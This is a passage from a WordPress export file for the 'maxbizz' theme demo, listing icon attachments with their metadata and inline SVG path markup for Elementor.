4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/business-and-finance-1/</link>
		<pubDate>Mon, 07 Dec 2020 08:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1408</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/business-and-finance-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>card</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/card/</link>
		<pubDate>Mon, 07 Dec 2020 08:54:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/card.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1409</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:54:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:54:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[card]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/card.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/card.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>holidays</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/holidays/</link>
		<pubDate>Mon, 07 Dec 2020 08:55:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/holidays.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1410</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:55:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:55:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[holidays]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/holidays.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/holidays.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>notebook</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/notebook/</link>
		<pubDate>Mon, 07 Dec 2020 08:56:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/notebook.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1411</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:56:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:56:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[notebook]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/notebook.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/notebook.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/badge/</link>
		<pubDate>Mon, 07 Dec 2020 08:56:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1412</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:56:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:56:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/badge.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bars-chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/bars-chart/</link>
		<pubDate>Mon, 07 Dec 2020 08:57:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
